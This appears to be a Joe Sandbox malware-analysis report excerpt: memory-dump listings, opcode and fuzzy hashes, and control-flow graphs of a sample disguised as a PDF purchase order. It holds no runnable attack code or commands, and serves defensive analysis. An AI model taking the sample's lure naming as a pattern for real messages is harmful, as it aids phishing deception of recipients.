                                                                                  • Instruction Fuzzy Hash: A2718F75E012188FDB04DFAAC984A9EFBF2BF89311F14C16AD519AB315D734A942CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a79ac9ab5ed420b8e4059a8bd09a280b0221a5e65513f0d49fd32e24ab76a3fb
                                                                                  • Instruction ID: 9a4130a9871b7cd680202a1e2d2f24ebbaf6a6a7b3d12375a74396f455756681
                                                                                  • Opcode Fuzzy Hash: a79ac9ab5ed420b8e4059a8bd09a280b0221a5e65513f0d49fd32e24ab76a3fb
                                                                                  • Instruction Fuzzy Hash: 5C51D574E002198FDB14CFA9D5809AEBBF2FF89305F248169D418AB356D771AD42CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d680ec1f7e008e3f915ded7a6ddad68f7f5006e231c94c09806c47f68143abef
                                                                                  • Instruction ID: ee3d38108ae968adca3fa5639e4cb500e65dbbc86416f1b953eb4f26a8651fe3
                                                                                  • Opcode Fuzzy Hash: d680ec1f7e008e3f915ded7a6ddad68f7f5006e231c94c09806c47f68143abef
                                                                                  • Instruction Fuzzy Hash: 46510474E002198FDB14DFA9D9809AEBBB2FF89344F248269D418AB256D7319D42CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b95ed88f4e917eb3cf4c92c8cecf723d85f2b90b465be351e194e742dac4b0ed
                                                                                  • Instruction ID: 1fdc4257f6fe8defda63313a952ff18f87aa50fcb9bbbe52cce9a41af565c751
                                                                                  • Opcode Fuzzy Hash: b95ed88f4e917eb3cf4c92c8cecf723d85f2b90b465be351e194e742dac4b0ed
                                                                                  • Instruction Fuzzy Hash: 79516E75E006198FDB48DFAAC98469EFBF2BF88301F14C16AE519AB314DB349946CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 528d926f751ae6ee31a7cfc6ed61af396b5a682733996f4cb0f3b139ae4cace8
                                                                                  • Instruction ID: 7799c3b54e3d6062062c77abeba801fb8cd7b2c0821955d40ef538d0fe3c3dd9
                                                                                  • Opcode Fuzzy Hash: 528d926f751ae6ee31a7cfc6ed61af396b5a682733996f4cb0f3b139ae4cace8
                                                                                  • Instruction Fuzzy Hash: 23B0922EF8B11595890809D470000F8F33E8B8B2BBF423066C64EB300153129D268148

                                                                                  Execution Graph

                                                                                  Execution Coverage:10.8%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:9.1%
                                                                                  Total number of Nodes:22
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 20451 5c69c70 20452 5c69c9d 20451->20452 20454 5c6bb7f 20452->20454 20456 5c69fa6 20452->20456 20457 5c69328 LdrInitializeThunk 20452->20457 20456->20454 20458 5c69328 LdrInitializeThunk 20456->20458 20457->20456 20458->20456 20459 152e018 20460 152e024 20459->20460 20464 5c6fc5f 20460->20464 20468 5c6fc68 20460->20468 20461 152e61f 20465 5c6fc8a 20464->20465 20467 5c6fd3a 20465->20467 20472 5c69548 LdrInitializeThunk LdrInitializeThunk 20465->20472 20467->20461 20469 5c6fc8a 20468->20469 20471 5c6fd3a 20469->20471 20473 5c69548 LdrInitializeThunk LdrInitializeThunk 20469->20473 20471->20461 20472->20467 20473->20471 20474 5c6992c 20478 5c697e3 20474->20478 20475 5c69924 LdrInitializeThunk 20477 5c69a81 20475->20477 20478->20475 20480 5c69328 LdrInitializeThunk 20478->20480 20480->20478

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 972 5c69548-5c69577 973 5c6957e-5c69614 972->973 974 5c69579 972->974 976 5c696b3-5c696b9 973->976 974->973 977 5c696bf-5c696d7 976->977 978 5c69619-5c6962c 976->978 979 5c696eb-5c696fe 977->979 980 5c696d9-5c696e6 977->980 981 5c69633-5c69684 978->981 982 5c6962e 978->982 984 5c69705-5c69721 979->984 985 5c69700 979->985 983 5c69a81-5c69b7e 980->983 998 5c69686-5c69694 981->998 999 5c69697-5c696a9 981->999 982->981 990 5c69b86-5c69b90 983->990 991 5c69b80-5c69b85 983->991 987 5c69723 984->987 988 5c69728-5c6974c 984->988 985->984 987->988 994 5c69753-5c69785 988->994 995 5c6974e 988->995 991->990 1004 5c69787 994->1004 1005 5c6978c-5c697ce 994->1005 995->994 998->977 1001 5c696b0 999->1001 1002 5c696ab 999->1002 1001->976 1002->1001 1004->1005 1007 5c697d5-5c697de 1005->1007 1008 5c697d0 1005->1008 1009 5c69a06-5c69a0c 1007->1009 1008->1007 1010 5c69a12-5c69a25 1009->1010 1011 5c697e3-5c69808 1009->1011 1014 5c69a27 1010->1014 1015 5c69a2c-5c69a47 1010->1015 1012 5c6980f-5c69846 1011->1012 1013 5c6980a 1011->1013 1023 5c6984d-5c6987f 1012->1023 1024 5c69848 1012->1024 1013->1012 1014->1015 1016 5c69a4e-5c69a62 1015->1016 1017 5c69a49 1015->1017 1020 5c69a64 1016->1020 1021 5c69a69-5c69a7f LdrInitializeThunk 1016->1021 1017->1016 1020->1021 1021->983 1026 5c698e3-5c698f6 1023->1026 1027 5c69881-5c698a6 1023->1027 1024->1023 1030 5c698fd-5c69922 1026->1030 1031 5c698f8 1026->1031 1028 5c698ad-5c698db 1027->1028 1029 5c698a8 1027->1029 1028->1026 1029->1028 1034 5c69924-5c69925 1030->1034 1035 5c69931-5c69969 1030->1035 1031->1030 1034->1010 1036 5c69970-5c699d1 call 5c69328 1035->1036 1037 5c6996b 1035->1037 1043 5c699d3 1036->1043 1044 5c699d8-5c699fc 1036->1044 1037->1036 1043->1044 1047 5c69a03 1044->1047 1048 5c699fe 1044->1048 1047->1009 1048->1047
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3896059789.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5c60000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0396ec27b823e785ad8fa2e500d454e3a5b4b15b14a3019f63cf1bcde30f66c5
                                                                                  • Instruction ID: 8a7be1b7110bba89457719cdab4f105655ccbe964c11fe6deb7b568b603d38ca
                                                                                  • Opcode Fuzzy Hash: 0396ec27b823e785ad8fa2e500d454e3a5b4b15b14a3019f63cf1bcde30f66c5
                                                                                  • Instruction Fuzzy Hash: BDF1D574E00218CFDB24DFA9C984B9DBBB2FF88304F5485A9D448AB355DB719A86CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cdf9ce1505654ae44de609e504d0f5aacf2d311b98292faa11a97463487d2c7a
                                                                                  • Instruction ID: 3d1290f1ae90e821018e77ac2da79ed5640f1e115495d0e28b71ef2b4eb22ba3
                                                                                  • Opcode Fuzzy Hash: cdf9ce1505654ae44de609e504d0f5aacf2d311b98292faa11a97463487d2c7a
                                                                                  • Instruction Fuzzy Hash: 46A28D36A002258FDB16CF68C984AAEBBF2BF8A300F158559E405DF7A6D774E845CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1b7a37419a7a3a811b705dd20cd9c1030336028a3c39cbb3b8ea28082497b656
                                                                                  • Instruction ID: 06d5c89d12a21c4e5d82e3bd1207cfb0335dd1c720940a456cc5db938b78b257
                                                                                  • Opcode Fuzzy Hash: 1b7a37419a7a3a811b705dd20cd9c1030336028a3c39cbb3b8ea28082497b656
                                                                                  • Instruction Fuzzy Hash: 01129B75A002198FDB14CF69C854BAEBBF2FF89300F208569E816AB395DF349D45CB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3394 1526fc8-1526ffe 3395 1527006-152700c 3394->3395 3546 1527000 call 15269a0 3394->3546 3547 1527000 call 1527118 3394->3547 3548 1527000 call 1526fc8 3394->3548 3396 152700e-1527012 3395->3396 3397 152705c-1527060 3395->3397 3398 1527021-1527028 3396->3398 3399 1527014-1527019 3396->3399 3400 1527062-1527071 3397->3400 3401 1527077-152708b 3397->3401 3404 15270fe-152713b 3398->3404 3405 152702e-1527035 3398->3405 3399->3398 3402 1527073-1527075 3400->3402 3403 152709d-15270a7 3400->3403 3406 1527093-152709a 3401->3406 3543 152708d call 1529dd0 3401->3543 3544 152708d call 1529de0 3401->3544 3545 152708d call 152a0e8 3401->3545 3402->3406 3408 15270b1-15270b5 3403->3408 3409 15270a9-15270af 3403->3409 3416 1527146-1527166 3404->3416 3417 152713d-1527143 3404->3417 3405->3397 3407 1527037-152703b 3405->3407 3410 152704a-1527051 3407->3410 3411 152703d-1527042 3407->3411 3412 15270bd-15270f7 3408->3412 3414 15270b7 3408->3414 3409->3412 3410->3404 3415 1527057-152705a 3410->3415 3411->3410 3412->3404 3414->3412 3415->3406 3422 1527168 3416->3422 3423 152716d-1527174 3416->3423 3417->3416 3425 15274fc-1527505 3422->3425 3426 1527176-1527181 3423->3426 3427 1527187-152719a 3426->3427 3428 152750d-1527519 3426->3428 3433 15271b0-15271cb 3427->3433 3434 152719c-15271aa 3427->3434 3435 152751b-1527549 3428->3435 3436 152756d-1527585 3428->3436 3446 15271ef-15271f2 3433->3446 3447 15271cd-15271d3 3433->3447 3434->3433 3444 1527484-152748b 3434->3444 3451 1527552-1527556 3435->3451 3452 152754b-1527550 3435->3452 3442 1527587-1527589 3436->3442 3443 152758b-152759a 3436->3443 3450 15275e9-15275eb 3442->3450 3466 15275e4 3443->3466 3467 152759c-15275ab 3443->3467 3444->3425 3455 152748d-152748f 3444->3455 3448 15271f8-15271fb 3446->3448 3449 152734c-1527352 3446->3449 3453 15271d5 3447->3453 3454 15271dc-15271df 3447->3454 3448->3449 3459 1527201-1527207 3448->3459 3456 1527358-152735d 3449->3456 3457 152743e-1527441 3449->3457 3460 152755c-152755d 3451->3460 3452->3460 3453->3449 3453->3454 3453->3457 3461 1527212-1527218 3453->3461 3454->3461 3462 15271e1-15271e4 3454->3462 3463 1527491-1527496 3455->3463 3464 152749e-15274a4 3455->3464 3456->3457 3469 1527447-152744d 3457->3469 3470 1527508 3457->3470 3459->3449 3468 152720d 3459->3468 3471 152721a-152721c 3461->3471 3472 152721e-1527220 3461->3472 3473 15271ea 3462->3473 3474 152727e-1527284 3462->3474 3463->3464 3464->3428 3465 15274a6-15274ab 3464->3465 3475 15274f0-15274f3 3465->3475 3476 15274ad-15274b2 3465->3476 3466->3450 3467->3466 3491 15275ad-15275b3 3467->3491 3468->3457 3478 1527472-1527476 3469->3478 3479 152744f-1527457 3469->3479 3470->3428 3480 152722a-1527233 3471->3480 3472->3480 3473->3457 3474->3457 3477 152728a-1527290 3474->3477 3475->3470 3489 15274f5-15274fa 3475->3489 3476->3470 3481 15274b4 3476->3481 3483 1527292-1527294 3477->3483 3484 1527296-1527298 3477->3484 3478->3444 3488 1527478-152747e 3478->3488 3479->3428 3485 152745d-152746c 3479->3485 3486 1527246-152726e 3480->3486 3487 1527235-1527240 3480->3487 3490 15274bb-15274c0 3481->3490 3492 15272a2-15272b9 3483->3492 3484->3492 3485->3433 3485->3478 3515 1527362-1527398 3486->3515 3516 1527274-1527279 3486->3516 3487->3457 3487->3486 3488->3426 3488->3444 3489->3425 3489->3455 3493 15274e2-15274e4 3490->3493 3494 15274c2-15274c4 3490->3494 3495 15275b7-15275c3 3491->3495 3496 15275b5 3491->3496 3508 15272e4-152730b 3492->3508 3509 15272bb-15272d4 3492->3509 3493->3470 3504 15274e6-15274e9 3493->3504 3500 15274d3-15274d9 3494->3500 3501 15274c6-15274cb 3494->3501 3502 15275c5-15275de 3495->3502 3496->3502 3500->3428 3506 15274db-15274e0 3500->3506 3501->3500 3502->3466 3518 15275e0-15275e2 3502->3518 3504->3475 3506->3493 3510 15274b6-15274b9 3506->3510 3508->3470 3523 1527311-1527314 3508->3523 3509->3515 3521 15272da-15272df 3509->3521 3510->3470 3510->3490 3524 15273a5-15273ad 3515->3524 3525 152739a-152739e 3515->3525 3516->3515 3518->3450 3521->3515 3523->3470 3526 152731a-1527343 3523->3526 3524->3470 3529 15273b3-15273b8 3524->3529 3527 15273a0-15273a3 3525->3527 3528 15273bd-15273c1 3525->3528 3526->3515 3541 1527345-152734a 3526->3541 3527->3524 3527->3528 3530 15273c3-15273c9 3528->3530 3531 15273e0-15273e4 3528->3531 3529->3457 3530->3531 3533 15273cb-15273d3 3530->3533 3534 15273e6-15273ec 3531->3534 3535 15273ee-152740d call 15276f1 3531->3535 3533->3470 3536 15273d9-15273de 3533->3536 3534->3535 3538 1527413-1527417 3534->3538 3535->3538 3536->3457 3538->3457 3539 1527419-1527435 3538->3539 3539->3457 3541->3515 3543->3406 3544->3406 3545->3406 3546->3395 3547->3395 3548->3395
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: defdcd2e4305e586cca073896709139a07d1dc8a579e083c898649fe021fa5ea
                                                                                  • Instruction ID: 44d89f34589e2b178088e57b97d643a924803b36d71233d94ce9a9dda3cbab24
                                                                                  • Opcode Fuzzy Hash: defdcd2e4305e586cca073896709139a07d1dc8a579e083c898649fe021fa5ea
                                                                                  • Instruction Fuzzy Hash: C0224B32A00225DFDB15CF69C884AAEBBF2FF9E304F158469E915AB2A1D734DC41CB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3701 1523e09-1523e25 3702 1523e27-1523e29 3701->3702 3703 1523e2e-1523e3e 3701->3703 3704 15240cc-15240d3 3702->3704 3705 1523e40 3703->3705 3706 1523e45-1523e55 3703->3706 3705->3704 3708 15240b3-15240c1 3706->3708 3709 1523e5b-1523e69 3706->3709 3712 15240d4-1524196 3708->3712 3714 15240c3-15240c7 call 15202c8 3708->3714 3709->3712 3713 1523e6f 3709->3713 3783 1524198 3712->3783 3784 1524199-152419a 3712->3784 3713->3712 3716 1523f72-1523f9a 3713->3716 3717 1523eb3-1523ed5 3713->3717 3718 1523e76-1523e88 3713->3718 3719 1523eda-1523efb 3713->3719 3720 1524039-1524065 3713->3720 3721 1523f9f-1523fc7 3713->3721 3722 1523f00-1523f21 3713->3722 3723 1523f26-1523f47 3713->3723 3724 1524067-1524082 call 15202d8 3713->3724 3725 15240a7-15240b1 3713->3725 3726 1524084-15240a5 call 15228f0 3713->3726 3727 152400e-1524034 3713->3727 3728 1523f4c-1523f6d 3713->3728 3729 1523fcc-1524009 3713->3729 3730 1523e8d-1523eae 3713->3730 3714->3704 3716->3704 3717->3704 3718->3704 3719->3704 3720->3704 3721->3704 3722->3704 3723->3704 3724->3704 3725->3704 3726->3704 3727->3704 3728->3704 3729->3704 3730->3704 3783->3784 3785 152419c 3784->3785 3786 152419d-15241ba 3784->3786 3785->3786 3787 15241c1-15242c9 call 1522358 call 1522368 call 1522378 call 1522388 call 15202e4 3786->3787 3788 15241bc 3786->3788 3806 15242cf-152435f 3787->3806 3788->3787
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a7c87311aea91d98e5881d4df46947fa04357529ff5238190f41c2412b7380e5
                                                                                  • Instruction ID: 5041d69c952b2484c98e6d7c01cebfe0820dfe3711ba462b895d76df04f20851
                                                                                  • Opcode Fuzzy Hash: a7c87311aea91d98e5881d4df46947fa04357529ff5238190f41c2412b7380e5
                                                                                  • Instruction Fuzzy Hash: 44F17875F00219DFDB18DFB5D8409AEBBF2FF89710B14896DE406AB294DB399C028B51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3814 15229ec-15229f6 3816 1522981-152298a 3814->3816 3817 15229f8-1522a01 3814->3817 3819 1522990-1522999 3816->3819 3818 1522a03-1522a3b 3817->3818 3817->3819 3822 1522a5d-1522aac 3818->3822 3823 1522a3d-1522a5c 3818->3823 3824 15229a0-15229c8 3819->3824 3829 1522ac7-1522acf 3822->3829 3830 1522aae-1522ab5 3822->3830 3834 1522ad2-1522ae6 3829->3834 3831 1522ab7-1522abc 3830->3831 3832 1522abe-1522ac5 3830->3832 3831->3834 3832->3834 3836 1522ae8-1522aef 3834->3836 3837 1522afc-1522b04 3834->3837 3838 1522af1-1522af3 3836->3838 3839 1522af5-1522afa 3836->3839 3840 1522b06-1522b0a 3837->3840 3838->3840 3839->3840 3842 1522b6a-1522b6d 3840->3842 3843 1522b0c-1522b21 3840->3843 3844 1522bb5-1522bbb 3842->3844 3845 1522b6f-1522b84 3842->3845 3843->3842 3851 1522b23-1522b26 3843->3851 3846 1522bc1-1522bc3 3844->3846 3847 15236b6 3844->3847 3845->3844 3857 1522b86-1522b8a 3845->3857 3846->3847 3849 1522bc9-1522bce 3846->3849 3854 15236bb-15236f0 3847->3854 3855 1523664-1523668 3849->3855 3856 1522bd4 3849->3856 3852 1522b45-1522b63 call 15202c8 3851->3852 3853 1522b28-1522b2a 3851->3853 3852->3842 3853->3852 3858 1522b2c-1522b2f 3853->3858 3875 15236f2-152371d 3854->3875 3876 152371f-1523881 3854->3876 3860 152366a-152366d 3855->3860 3861 152366f-15236b5 3855->3861 3856->3855 3862 1522b92-1522bb0 call 15202c8 3857->3862 3863 1522b8c-1522b90 3857->3863 3858->3842 3865 1522b31-1522b43 3858->3865 3860->3854 3860->3861 3862->3844 3863->3844 3863->3862 3865->3842 3865->3852 3875->3876
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e56f8788dcd8df93d222857c9a8889fabaad033c46a8e22b646223a7e14b1ab9
                                                                                  • Instruction ID: dc3a2f38dddd831b43f11d2b5056a9c938472f77dbc3cf4d782a47dc319c5efb
                                                                                  • Opcode Fuzzy Hash: e56f8788dcd8df93d222857c9a8889fabaad033c46a8e22b646223a7e14b1ab9
                                                                                  • Instruction Fuzzy Hash: 1CB13776D003298FCBA18F64C8446AFBBB5FFC6320F11866ED0456B681D7789D45CB92

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 4159 152c146-152c158 4160 152c184 4159->4160 4161 152c15a-152c172 4159->4161 4162 152c186-152c18a 4160->4162 4165 152c174-152c179 4161->4165 4166 152c17b-152c17e 4161->4166 4165->4162 4167 152c180-152c182 4166->4167 4168 152c18b-152c199 4166->4168 4167->4160 4167->4161 4170 152c21a 4168->4170 4171 152c19b-152c19d 4168->4171 4172 152c21e-152c21f 4170->4172 4171->4172 4173 152c19f-152c1a1 4171->4173 4174 152c222-152c2ac call 15241a0 call 1523cc0 4172->4174 4173->4174 4175 152c1a3-152c1c8 4173->4175 4186 152c2b3-152c2d4 call 1525658 4174->4186 4187 152c2ae 4174->4187 4177 152c1ca 4175->4177 4178 152c1cf-152c217 4175->4178 4177->4178 4178->4170 4189 152c2d9-152c2e4 4186->4189 4187->4186 4190 152c2e6 4189->4190 4191 152c2eb-152c2ef 4189->4191 4190->4191 4192 152c2f1-152c2f2 4191->4192 4193 152c2f4-152c2fb 4191->4193 4194 152c313-152c357 4192->4194 4195 152c302-152c310 4193->4195 4196 152c2fd 4193->4196 4200 152c3bd-152c3d4 4194->4200 4195->4194 4196->4195 4202 152c3d6-152c3fb 4200->4202 4203 152c359-152c36f 4200->4203 4209 152c413 4202->4209 4210 152c3fd-152c412 4202->4210 4207 152c371-152c37d 4203->4207 4208 152c399 4203->4208 4211 152c387-152c38d 4207->4211 4212 152c37f-152c385 4207->4212 4213 152c39f-152c3bc 4208->4213 4210->4209 4214 152c397 4211->4214 4212->4214 4213->4200 4214->4213
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2bcf789b7f2fb0b4fb00cd2ed3d6af0b4472386d3610cfc56db4c1a43d7fc74b
                                                                                  • Instruction ID: 2aadc0e412653aed1fbdd798ba4f28ecfb41f5501da0c7cb9bd547f1f9589c99
                                                                                  • Opcode Fuzzy Hash: 2bcf789b7f2fb0b4fb00cd2ed3d6af0b4472386d3610cfc56db4c1a43d7fc74b
                                                                                  • Instruction Fuzzy Hash: 95A1E775E00218DFDB54CFAAD884A9DBBF2BF89310F14846AE409AB365DB319941CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4259434591e9a2ba0c16996ba6626ae2610950c34d2ca868079bd74f7eefee26
                                                                                  • Instruction ID: c956a741c240f0cf98b52a9cd03de67f0e68ccec768945291782de354ddd326d
                                                                                  • Opcode Fuzzy Hash: 4259434591e9a2ba0c16996ba6626ae2610950c34d2ca868079bd74f7eefee26
                                                                                  • Instruction Fuzzy Hash: C85129337403219BDB998A658C806AF7BF6BBC6660B49847ED402DF792D77CCC068761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 852ccf755a4bbaad36133f643861a611604565a1c7247911c4d3c8e24209d671
                                                                                  • Instruction ID: d6f4df24952082378a5810fae323fb6d823b4734d2f1bc6d095e2c82ccc1bef7
                                                                                  • Opcode Fuzzy Hash: 852ccf755a4bbaad36133f643861a611604565a1c7247911c4d3c8e24209d671
                                                                                  • Instruction Fuzzy Hash: C091D575E10218DFDB14CFAAD884ADDBBF2BF89311F148069E409AB365EB349945CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a424f8f35baaaec36d6d68de669ec4e606f169d38c71803d33d01acc604726e6
                                                                                  • Instruction ID: 41cdbce4c29fe104528ba69d6c8082c940def040f00f1bdb4945b386d8dce152
                                                                                  • Opcode Fuzzy Hash: a424f8f35baaaec36d6d68de669ec4e606f169d38c71803d33d01acc604726e6
                                                                                  • Instruction Fuzzy Hash: 9781C375E00218DFEB14DFAAD884A9DBBF2BF89300F14C16AE819AB365DB305941CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f45e153f41147047063b60c403896219613714516976c6be7f1a934b4a8eb99b
                                                                                  • Instruction ID: 4c02b09a940db37cb26c8268a8fc779056f845a1b103b7deba865bb14bda5fb0
                                                                                  • Opcode Fuzzy Hash: f45e153f41147047063b60c403896219613714516976c6be7f1a934b4a8eb99b
                                                                                  • Instruction Fuzzy Hash: EC81C675E00618DFEB14DFAAD944A9DBBF2BF89300F14C16AE419AB365DB30A941CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b94062360c6760b19de99a4bbc6d0d76cfca31579bf48aa4fcff63ae486c397d
                                                                                  • Instruction ID: 6d8aa9be7810c04f9b3c97556c5e6ca0ec119dd85343da14fd4c2a7e841882d9
                                                                                  • Opcode Fuzzy Hash: b94062360c6760b19de99a4bbc6d0d76cfca31579bf48aa4fcff63ae486c397d
                                                                                  • Instruction Fuzzy Hash: AA81C575E00618CFEB14DFAAD844A9DBBF2BF89310F14C16AE819AB365DB305941CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e314216d737eaea5834c5d15628b66c593c332bf03780883b01a748e9d24f6df
                                                                                  • Instruction ID: fbfd9e90873b01ed146578e4e2ede577bf0111914c3adcc28816d31ddb8501c7
                                                                                  • Opcode Fuzzy Hash: e314216d737eaea5834c5d15628b66c593c332bf03780883b01a748e9d24f6df
                                                                                  • Instruction Fuzzy Hash: 5781C5B5E00218CFEB54DFAAD884A9DBBF2BF89300F14C069E419AB365DB745941CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
